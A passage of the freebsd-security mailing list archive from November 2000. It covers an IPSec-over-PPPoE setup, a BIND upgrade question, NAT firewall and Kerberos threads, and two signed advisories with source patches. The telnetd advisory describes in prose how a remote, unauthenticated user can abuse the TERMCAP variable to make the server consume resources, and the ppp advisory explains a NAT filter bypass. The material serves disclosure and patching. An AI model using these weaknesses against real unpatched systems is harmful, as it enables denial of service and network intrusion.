to make sure you have a recent version of racoon. I used the one from November 11th. Here is a quick sample config for two machines PPPoE machine's _public_ address on tun0 : 169.1.134.1 PPPoE machine's _private_ address aliased on lo0 : 10.1.2.1 Office Server's _public_ address on fxp0 172.168.93.4 Office Server's _private_ address aliased on lo0 : 10.1.1.1 *Note, if your machine has 2 interfaces, you can of course use the RFC1918 space on it instead. This example assumes you just have the one NIC to play with. #!/bin/sh #PPPoE config ifconfig lo0 10.1.2.1 netmask 255.255.255.0 alias gifconfig gif0 169.1.134.1 172.168.93.4 ifconfig gif0 inet 10.1.2.1 10.1.1.1 netmask 255.255.255.0 setkey -FP setkey -F setkey -c < > On 9 Nov 2000 17:01:58 -0500, in sentex.lists.freebsd.net you wrote: > > > > >Hi all, > > > > > >Has anyone ever successfully configured VPN (using IPSec protocol) over > > >PPPoE connection? I have 1 VPN configured over 2 locations with T1 > > >connections without any problem (using the KAME IPSec on FreeBSD > > >4.1.1). However, when I tried the same configuration with the 3rd > > >location running DSL, it seems the IPSec packets can't reach out via tun0 > > >device. > > > > I can do it with manual keying, but not with racoon. Both transport and > > tunnel mode work for me, but neither works with racoon. NAT is a bit > > tricky, but then again with tunnel mode, it doesnt really matter. > > > > > > One end is > > 4.2-BETA FreeBSD 4.2-BETA #0: Mon Nov 13 13:52:46 EST 2000 > > other is > > 4.2-BETA FreeBSD 4.2-BETA #0: Sun Nov 5 18:25:14 EST 2000 > > > > This is via the same sort of DSL you are using i.e. Bell Nexxia type stuff > > through a Redback etc... > > > > I havent had time to send a note to the KAME folk, but when using racoon on > > DSL, I get these sorts of log entries that I dont normally get > > > > 2000-11-13 23:46:29: isakmp_agg.c:927:agg_r2recv(): > > real.addr.totally-diff-subnet.1 ignore the packet, received unexpecting > > payload type 1. > > 2000-11-13 23:46:10: isakmp_inf.c:177:isakmp_info_recv(): > > real.addr.totally-diff-subnet.1 ignore the packet, received unexpecting > > payload type 89. > > 2000-11-13 23:52:37: isakmp_inf.c:177:isakmp_info_recv(): > > real.addr.totally-diff-subnet.4 ignore the packet, received unexpecting > > payload type 187. > > > > ---Mike > > Mike Tancsa (mdtancsa@sentex.net) > > Sentex Communications Corp, > > Waterloo, Ontario, Canada > > "Given enough time, 100 monkeys on 100 routers > > could setup a national IP network." (KDW2) > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 14:16:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 9C9A937B479 for ; Tue, 14 Nov 2000 14:16:35 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAEMHmk30717; Tue, 14 Nov 2000 14:17:48 -0800 (PST) (envelope-from kris) Date: Tue, 14 Nov 2000 14:17:48 -0800 From: Kris Kennaway To: Evren Yurtesen Cc: freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) Message-ID: <20001114141747.A30689@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="6TrnltStXW4iwmi0" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from eyurtese@turkuamk.fi on Tue, Nov 14, 2000 at 09:22:56PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --6TrnltStXW4iwmi0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Nov 14, 2000 at 09:22:56PM +0200, Evren Yurtesen wrote: > Isn't there any plans of putting the latest version of bind to the source > tree? At the ISC web page it is told that there are 8 bugs about the > patchlevel 6 The upgrade will be committed shortly, I believe - it only applies to 3.x, since 4.x has 8.2.3. Kris --6TrnltStXW4iwmi0 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoRugsACgkQWry0BWjoQKVFRwCfV/qbqrVS4In0c01JrU+GNWSP Tx8AoJybDxlsRtPBGdQ/X6A1+vM+oxWc =oVi7 -----END PGP SIGNATURE----- --6TrnltStXW4iwmi0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 14:31:36 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 4FA8837B479; Tue, 14 Nov 2000 14:30:59 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:69.telnetd Reply-To: security-advisories@freebsd.org Message-Id: <20001114223059.4FA8837B479@hub.freebsd.org> Date: Tue, 14 Nov 2000 14:30:59 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:69 Security Advisory FreeBSD, Inc. Topic: telnetd allows remote system resource consumption. Category: core Module: telnetd Announced: 2000-11-14 Credits: Jouko Pynnonen Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases prior to 4.2), FreeBSD 3.5.1-STABLE and 4.1.1-STABLE prior to the correction date. Corrected: 2000-10-30 (FreeBSD 4.1.1-STABLE) 2000-11-01 (FreeBSD 3.5.1-STABLE) FreeBSD only: NO I. Background telnetd is the server for the telnet remote login protocol. II. Problem Description The telnet protocol allows for UNIX environment variables to be passed from the client to the user login session on the server. However, some of these environment variables have special meaning to the telnetd child process itself and may be used to affect its operation. Of particular relevance is the ability for remote users to cause an arbitrary file on the system to be searched for termcap data by passing the TERMCAP environment variable. Although any file on the local system can be read since the telnetd server runs as root, the contents of the file will not be reported in any way to the remote user unless it contains a valid termcap entry, in which case the corresponding termcap sequences will be used to format the output sent to the client. It is believed there is no risk of data disclosure through this vulnerability. However, an attacker who forces the server to search through a large file or to read from a device can cause resources to be spent by the server, including CPU cycles and disk read bandwidth, which can increase the server load and may prevent it from servicing legitimate user requests. Since the vulnerability occurs before the login(1) utility is spawned, it does not require authentication to a valid account on the server in order to exploit. All released versions of FreeBSD prior to the correction date including 4.0, 4.1, 4.1.1 and 3.5.1 are vulnerable to this problem, but it was fixed in the 4.1.1-STABLE branch prior to the release of FreeBSD 4.2-RELEASE. III. Impact Remote users without a valid login account on the server can cause resources such as CPU and disk read bandwidth to be consumed, causing increased server load and possibly denying service to legitimate users. IV. Workaround 1) Disable the telnet service, which is usually run out of inetd: comment out the following lines in /etc/inetd.conf, if present. telnet stream tcp nowait root /usr/libexec/telnetd telnetd telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd 2) Impose access restrictions using TCP wrappers (/etc/hosts.allow), or a network-level packet filter such as ipfw(8) or ipf(8) on the perimeter firewall or the local machine, to limit access to the telnet service to trusted machines. V. Solution One of the following: 1) Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE or 3.5.1-STABLE after the respective correction dates. 2) Apply the patch below and recompile the relevant files: Either save this advisory to a file, or download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:69/telnetd.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:69/telnetd.patch.asc Execute the following commands as root: # cd /usr/src/libexec/telnetd # patch -p < /path/to/patch_or_advisory # make depend && make all install Patch for vulnerable systems: Index: sys_term.c =================================================================== RCS file: /mnt/ncvs/src/libexec/telnetd/sys_term.c,v retrieving revision 1.24 retrieving revision 1.25 diff -u -r1.24 -r1.25 --- sys_term.c 1999/08/28 00:10:24 1.24 +++ sys_term.c 2000/10/31 05:29:54 1.25 @@ -1799,6 +1799,13 @@ strncmp(*cpp, "_RLD_", 5) && strncmp(*cpp, "LIBPATH=", 8) && #endif + strncmp(*cpp, "LOCALDOMAIN=", 12) && + strncmp(*cpp, "RES_OPTIONS=", 12) && + strncmp(*cpp, "TERMINFO=", 9) && + strncmp(*cpp, "TERMINFO_DIRS=", 14) && + strncmp(*cpp, "TERMPATH=", 9) && + strncmp(*cpp, "TERMCAP=/", 9) && + strncmp(*cpp, "ENV=", 4) && strncmp(*cpp, "IFS=", 4)) *cpp2++ = *cpp; } Index: telnetd.c =================================================================== RCS file: /mnt/ncvs/src/libexec/telnetd/telnetd.c,v retrieving revision 1.22 retrieving revision 1.23 diff -u -r1.22 -r1.23 --- telnetd.c 2000/01/25 14:52:00 1.22 +++ telnetd.c 2000/10/31 05:29:54 1.23 @@ -811,7 +811,7 @@ fatal(net, "Out of ptys"); if ((pty = open(lp, 2)) >= 0) { - strcpy(line,lp); + strlcpy(line,lp,sizeof(line)); line[5] = 't'; break; } @@ -1115,7 +1115,7 @@ IM = Getstr("im", &cp); IF = Getstr("if", &cp); if (HN && *HN) - (void) strcpy(host_name, HN); + (void) strlcpy(host_name, HN, sizeof(host_name)); if (IF && (if_fd = open(IF, O_RDONLY, 000)) != -1) IM = 0; if (IM == 0) Index: utility.c =================================================================== RCS file: /mnt/ncvs/src/libexec/telnetd/utility.c,v retrieving revision 1.13 retrieving revision 1.14 diff -u -r1.13 -r1.14 --- utility.c 1999/08/28 00:10:25 1.13 +++ utility.c 2000/10/31 05:29:54 1.14 @@ -330,7 +330,7 @@ { char buf[BUFSIZ]; - (void) sprintf(buf, "telnetd: %s.\r\n", msg); + (void) snprintf(buf, sizeof(buf), "telnetd: %s.\r\n", msg); (void) write(f, buf, (int)strlen(buf)); sleep(1); /*XXX*/ exit(1); @@ -343,7 +343,7 @@ { char buf[BUFSIZ], *strerror(); - (void) sprintf(buf, "%s: %s", msg, strerror(errno)); + (void) snprintf(buf, sizeof(buf), "%s: %s", msg, strerror(errno)); fatal(f, buf); } -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOhG9KFUuHi5z0oilAQHUZwP/Xmo3EDteE4HwZovAO6UFzNtc3xVsFaUr Thf5XvpPThIOKmyYsUOL/kRbfnU3vJUdPA21uDYKyUEil5+x8+ZAuDzJXfMxHwu8 MMD1/d5QFfvuWN5W+/msdT7XKEjTmm4f09/tMxRAEyIMeKRj2H4gWxEGmaivJtvT 6bFKtbsSW1Q= =UltL -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 14:32:30 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 72E6B37B4D7; Tue, 14 Nov 2000 14:32:03 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:70.ppp-nat Reply-To: security-advisories@freebsd.org Message-Id: <20001114223203.72E6B37B4D7@hub.freebsd.org> Date: Tue, 14 Nov 2000 14:32:03 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:70 Security Advisory FreeBSD, Inc. Topic: ppp "deny_incoming" does not correctly deny incoming packets Category: core Module: ppp Announced: 2000-11-14 Credits: Robin Melville Affects: FreeBSD 3.5, 3.5.1, 4.1, 4.1.1 FreeBSD 3.5.1-STABLE and 4.1.1-STABLE prior to the correction date. Corrected: 2000-10-30 (FreeBSD 4.1.1-STABLE) 2000-10-30 (FreeBSD 3.5.1-STABLE) FreeBSD only: Yes I. Background The ppp(8) utility includes network address translation functionality for translating between public and private IP address ranges. It uses the libalias library to perform translation services. II. Problem Description The "nat deny_incoming" command is documented as "refusing all incoming connections" and is commonly used as a simple "firewall" to prevent outside users from connecting to services on the internal network. However the behaviour of the ppp code was changed in the 4.x and 3.x branches prior to the release of FreeBSD 4.1 and 3.5 (on 2000-06-05 and 2000-06-03 respectively) to allow passing of packets which are not understood, such as IPSEC packets and other IP protocol traffic not explicitly recognised by the code as being an "incoming connection attempt". While this was arguably incorrect behaviour in itself, the code also incorrectly allowed through ALL incoming traffic, effectively turning "deny_incoming" into a no-op. Thus, users who are using the deny_incoming functionality in the expectation that it provides a "deny by default" firewall which only allows through packets known to be part of an existing NAT session, are in fact allowing other types of unsolicited IP traffic into their internal network. The behaviour of ppp was corrected to only allow incoming packets which are known to be part of a valid NAT session, which gives the desired packet filtering behaviour in the general case. Outgoing IP traffic which is not understood by libalias (such as an outgoing IPSEC packet part of a VPN) will cause a NAT session to be established which will allow incoming packets with the corresponding source and destination IP addresses and protocol number to pass, but all others to be denied. This behaviour may be sufficient for the security needs of many users, although users with advanced filtering or security policy requirements are advised to use a more configurable packet filter such as those provided by ipfw(8) or ipf(8) which can meet their needs. The following released versions of FreeBSD are the only releases vulnerable to this problem: 3.5, 3.5.1, 4.1, 4.1.1. It was fixed in the 4.1.1-STABLE branch prior to the release of FreeBSD 4.2-RELEASE. III. Impact Remote users can cause incoming traffic which is not part of an existing NAT session to pass the NAT gateway, which may constitute a breach of security policy. IV. Workaround Use a true packet filter such as ipfw(8) or ipf(8) on the PPP gateway to deny incoming traffic according to the desired security policy. V. Solution One of the following: 1) Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE or 3.5.1-STABLE after the respective correction dates. 2) Apply the patch below and recompile the relevant files: Either save this advisory to a file, or download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:70/ppp.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:70/ppp.patch.asc Execute the following commands as root: # cd /usr/src/usr.sbin/ppp # patch -p < /path/to/patch_or_advisory # make depend && make all install Patch for vulnerable systems: Index: nat_cmd.c =================================================================== RCS file: /mnt/ncvs/src/usr.sbin/ppp/nat_cmd.c,v retrieving revision 1.49 retrieving revision 1.50 diff -u -r1.49 -r1.50 - --- nat_cmd.c 2000/07/11 22:11:31 1.49 +++ nat_cmd.c 2000/10/30 18:02:01 1.50 @@ -421,7 +421,11 @@ break; case PKT_ALIAS_IGNORED: - - if (log_IsKept(LogTCPIP)) { + if (PacketAliasSetMode(0, 0) & PKT_ALIAS_DENY_INCOMING) { + log_Printf(LogTCPIP, "NAT engine denied data:\n"); + m_freem(bp); + bp = NULL; + } else if (log_IsKept(LogTCPIP)) { log_Printf(LogTCPIP, "NAT engine ignored data:\n"); PacketCheck(bundle, MBUF_CTOP(bp), bp->m_len, NULL, NULL, NULL); } -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOhG88FUuHi5z0oilAQFcaAP8D9gkr5GbGfj0visocGTMzKmhbXCwtgVX B5qwVdDKYSx3sAicK32gsnKdxJYno5D7Vd8ic0/N28DfuR+rw7tyGKPkgZZQiptL CTODBugeHFV/XZ3CyES+orkRN78Wgc6kBZtvyudaXtYHbzRo2K48acOGnQN/X4tR Tt613Vl57rY= =SCKm -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 14:45:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from grok.example.net (cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by hub.freebsd.org (Postfix) with ESMTP id B439A37B4CF for ; Tue, 14 Nov 2000 14:45:13 -0800 (PST) Received: by grok.example.net (Postfix, from userid 1000) id 3B12521314D; Tue, 14 Nov 2000 14:45:13 -0800 (PST) Date: Tue, 14 Nov 2000 14:45:13 -0800 From: Steve Reid To: Nuno Teixeira Cc: freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security Message-ID: <20001114144513.A888@grok> References: <00c801c04dc4$12a89220$0200a8c0@n2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <00c801c04dc4$12a89220$0200a8c0@n2>; from Nuno Teixeira on Mon, Nov 13, 2000 at 10:50:05PM -0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Nov 13, 2000 at 10:50:05PM -0000, Nuno Teixeira wrote: > ppp -background -nat MYISP > It works OK and I have access to a lot of Internet services. > My question is: do I need to configure this machine with firewall, so I can > protect my internal network from the outside net? You probably don't _need_ a firewall, but it usually is a good idea. In practice NAT provides some protection, but that is not what NAT is intended for so I wouldn't rely on it. The usual way to do it is with ipfw or ipfilter. "man ipfw" and "man ipf" respectively. Because you're using userland PPP you can also do it via the ppp daemon ("man ppp"). I would recommend using ipfw or ipfilter though, as then you don't have to re-write your filter rules if you ever change to a non-ppp interface. You'll probably find more ipf/ipfw information than ppp filter information, because ipf and ipfw are more widely used. Google search for "ipfw howto" or "ipf howto" should turn up some nice docs. Both ipfw and ipf are stateful now, so AFAICS the remaining differences are relatively minor for most people. ipf has been ported to systems other than FreeBSD; ipfw works with ethernet bridging. There may be other differences I'm not aware of- I'm an ipf user myself and haven't used ipfw in years. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 16: 2:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from pt-quorum.com (pt-quorum.com [209.10.167.210]) by hub.freebsd.org (Postfix) with ESMTP id 421B137B4C5 for ; Tue, 14 Nov 2000 16:02:48 -0800 (PST) Received: from n2 (d128239.lsb.PT.EU.net [193.126.128.239]) by pt-quorum.com (8.9.3/8.9.3) with SMTP id XAA32762; Tue, 14 Nov 2000 23:57:16 GMT Message-ID: <001c01c04e97$c69c3c90$0200a8c0@n2> From: "Nuno Teixeira" To: "Steve Reid" Cc: References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok> Subject: Re: PPP NAT Gateway security Date: Wed, 15 Nov 2000 00:05:28 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I've configured a 'client' firewall (in the /etc/rc.firewall) in FreeBSD for a private class C IP numbers of my network. It works ok inside the network but I can't get access to the Internet. I believe that this problem is related to my ISP (PPP analog modem) doesn't give me a static IP but a dinamic one. What I'd like to do is something like BlackIce do in Windows OS. Can I do the same work with IPFW? Thanks very much, Nuno Teixeira ----- Original Message ----- From: "Steve Reid" To: "Nuno Teixeira" Cc: Sent: Tuesday, November 14, 2000 10:45 PM Subject: Re: PPP NAT Gateway security > On Mon, Nov 13, 2000 at 10:50:05PM -0000, Nuno Teixeira wrote: > > ppp -background -nat MYISP > > It works OK and I have access to a lot of Internet services. > > My question is: do I need to configure this machine with firewall, so I can > > protect my internal network from the outside net? > > You probably don't _need_ a firewall, but it usually is a good idea. In > practice NAT provides some protection, but that is not what NAT is > intended for so I wouldn't rely on it. > > The usual way to do it is with ipfw or ipfilter. "man ipfw" and "man > ipf" respectively. Because you're using userland PPP you can also do it > via the ppp daemon ("man ppp"). I would recommend using ipfw or > ipfilter though, as then you don't have to re-write your filter rules > if you ever change to a non-ppp interface. You'll probably find more > ipf/ipfw information than ppp filter information, because ipf and ipfw > are more widely used. Google search for "ipfw howto" or "ipf howto" > should turn up some nice docs. > > Both ipfw and ipf are stateful now, so AFAICS the remaining differences > are relatively minor for most people. ipf has been ported to systems > other than FreeBSD; ipfw works with ethernet bridging. There may be > other differences I'm not aware of- I'm an ipf user myself and haven't > used ipfw in years. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 16:37:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (tun.AwfulHak.org [194.242.139.173]) by hub.freebsd.org (Postfix) with ESMTP id 2625E37B479 for ; Tue, 14 Nov 2000 16:37:15 -0800 (PST) Received: from hak.lan.Awfulhak.org (root@hak.lan.awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.1/8.11.1) with ESMTP id eAF0XZF16557; Wed, 15 Nov 2000 00:33:35 GMT (envelope-from brian@hak.lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.1/8.11.1) with ESMTP id eAEIoXY00540; Tue, 14 Nov 2000 18:50:33 GMT (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200011141850.eAEIoXY00540@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 To: "Nuno Teixeira" Cc: freebsd-security@FreeBSD.ORG, brian@Awfulhak.org Subject: Re: PPP NAT Gateway security In-Reply-To: Message from "Nuno Teixeira" of "Mon, 13 Nov 2000 22:50:05 GMT." <00c801c04dc4$12a89220$0200a8c0@n2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 14 Nov 2000 18:50:33 +0000 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hello to all, > > Recently I configured a FreeBSD box to act like a gateway for my NT > workstation computers at my office have access to the Internet. I configured > it in this way: > > ppp -background -nat MYISP > > It works OK and I have access to a lot of Internet services. > > My question is: do I need to configure this machine with firewall, so I can > protect my internal network from the outside net? > > If I need so, please tell me a good place to start with firewalls for > FreeBSD. If you just want to deny incoming connections, you can ``nat deny_incoming yes'' and ``nat target MYADDR'' in your config (although *MAKE SURE* you've got a recent version of ppp - you can get it via http://www.Awfulhak.org/ppp.html - if in doubt, test it from the outside). Read the section on that command in the man page too.... If you wish to be more selective, you need to use either ``set filter'' in ppp or the external ipfw(8) program. > Thanks very much, > > Nuno Teixeira -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 18:43:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 0D14337B4C5 for ; Tue, 14 Nov 2000 18:43:21 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAF2iEn03946; Tue, 14 Nov 2000 18:44:14 -0800 (PST) (envelope-from kris) Date: Tue, 14 Nov 2000 18:44:14 -0800 From: Kris Kennaway To: Brian Somers Cc: Nuno Teixeira , freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security Message-ID: <20001114184414.A3878@citusc17.usc.edu> References: <200011141850.eAEIoXY00540@hak.lan.Awfulhak.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dDRMvlgZJXvWKvBx" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200011141850.eAEIoXY00540@hak.lan.Awfulhak.org>; from brian@Awfulhak.org on Tue, Nov 14, 2000 at 06:50:33PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --dDRMvlgZJXvWKvBx Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Nov 14, 2000 at 06:50:33PM +0000, Brian Somers wrote: > > Hello to all, > >=20 > > Recently I configured a FreeBSD box to act like a gateway for my NT > > workstation computers at my office have access to the Internet. I confi= gured > > it in this way: > >=20 > > ppp -background -nat MYISP > >=20 > > It works OK and I have access to a lot of Internet services. > >=20 > > My question is: do I need to configure this machine with firewall, so I= can > > protect my internal network from the outside net? > >=20 > > If I need so, please tell me a good place to start with firewalls for > > FreeBSD. >=20 > If you just want to deny incoming connections, you can ``nat=20 > deny_incoming yes'' and ``nat target MYADDR'' in your config=20 > (although *MAKE SURE* you've got a recent version of ppp - you can=20 > get it via http://www.Awfulhak.org/ppp.html - if in doubt, test it=20 > from the outside). The reason for this is described in security advisory 00:70 released today. Kris --dDRMvlgZJXvWKvBx Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoR+H0ACgkQWry0BWjoQKVkygCguo4umecmID1Kbgo9S1Fo8sbr flEAn2BLBdswAF4GZz0y49ES3l9ushGx =3Co1 -----END PGP SIGNATURE----- --dDRMvlgZJXvWKvBx-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 21:19:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from grok.example.net (cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by hub.freebsd.org (Postfix) with ESMTP id 6CA0E37B479 for ; Tue, 14 Nov 2000 21:19:40 -0800 (PST) Received: by grok.example.net (Postfix, from userid 1000) id B860721314D; Tue, 14 Nov 2000 21:19:34 -0800 (PST) Date: Tue, 14 Nov 2000 21:19:34 -0800 From: Steve Reid To: Nuno Teixeira Cc: freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security Message-ID: <20001114211934.B888@grok> References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok> <001c01c04e97$c69c3c90$0200a8c0@n2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <001c01c04e97$c69c3c90$0200a8c0@n2>; from Nuno Teixeira on Wed, Nov 15, 2000 at 12:05:28AM -0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 15, 2000 at 12:05:28AM -0000, Nuno Teixeira wrote: > I've configured a 'client' firewall (in the /etc/rc.firewall) in FreeBSD for > a private class C IP numbers of my network. It works ok inside the network > but I can't get access to the Internet. I believe that this problem is > related to my ISP (PPP analog modem) doesn't give me a static IP but a > dinamic one. This is what I've whipped up for my ipfilter config: http://sea-to-sky.net/~sreid/ipfinit A simple little sh script that takes an interface name (fxp0 in my case, tun0 in yours) as an argument and extracts the IP address information from ifconfig, then performs the appropriate substitutions on ipf.cfg and feeds the results to ipf. http://sea-to-sky.net/~sreid/ipf.cfg My IP Filter configuration template. Must be processed by ipfinit. Default-deny approach with no special handling for FTP connections (use passive mode). Feel free to use and/or distribute, just give it a look over first to make sure I'm not on crack. If I am then please tell me. To use the above, add "options IPFILTER" to your kernel config. > What I'd like to do is something like BlackIce do in Windows OS. Can I do > the same work with IPFW? I'm not familiar with BlackIce. Heck, I'm not really even familiar with Windows anymore. :) But from what I gather you're asking about logging unexpected packets. My ipf config has a "log" directive for anything that is addressed to me but not allowed to pass. Requres "options IPFILTER_LOG" in the kernel config, and "ipmon /var/log/ipf.log" (or equivalent) running in the background. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 1: 1:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp4.port.ru (mx5.port.ru [194.67.23.40]) by hub.freebsd.org (Postfix) with ESMTP id D87FE37B479 for ; Wed, 15 Nov 2000 01:01:26 -0800 (PST) Received: from ns.prodemo.ru ([195.90.131.210] helo=eterra.eterramed.ru) by smtp4.port.ru with esmtp (Exim 3.14 #44) id 13vyRR-000Cll-00 for freebsd-security@freebsd.org; Wed, 15 Nov 2000 12:01:17 +0300 Date: Wed, 15 Nov 2000 11:59:27 +0300 From: "Timur A. Hakimyanov" X-Mailer: The Bat! (v1.34) S/N A1D26E39 / Educational Reply-To: "Timur A. Hakimyanov" Organization: eterra X-Priority: 3 (Normal) Message-ID: <11499.001115@mail.ru> To: freebsd-security@freebsd.org Subject: kerberos IV Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello All, I am running FreeBSD 4.1.1 RELEASE. ----cut---- Neverland# grep kerb /etc/rc.conf kerberos_server_enable="YES" Neverland# ps ax|grep kerb 104 con- S+ 0:00.01 kerberos Neverland# kinit FreeBSD Inc. (Neverland) Kerberos Initialization Kerberos name: timur Password: kinit: Can't send request (send_to_kdc) Neverland# ----cut---- Is there anybody, who knows something about this problemm? I'm not subscribed to this mailing list, so pls answer to tr_ghost@mail.ru -- Best regards, Timur mailto:tr_ghost@mail.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 3:29:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id B1F7337B4E5 for ; Wed, 15 Nov 2000 03:29:19 -0800 (PST) Received: (qmail 93391 invoked by uid 1000); 15 Nov 2000 11:29:18 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Nov 2000 11:29:18 -0000 Date: Wed, 15 Nov 2000 06:29:16 -0500 (EST) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Kris Kennaway Cc: Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-Reply-To: <20001114141747.A30689@citusc17.usc.edu> Message-ID: MIME-Version: 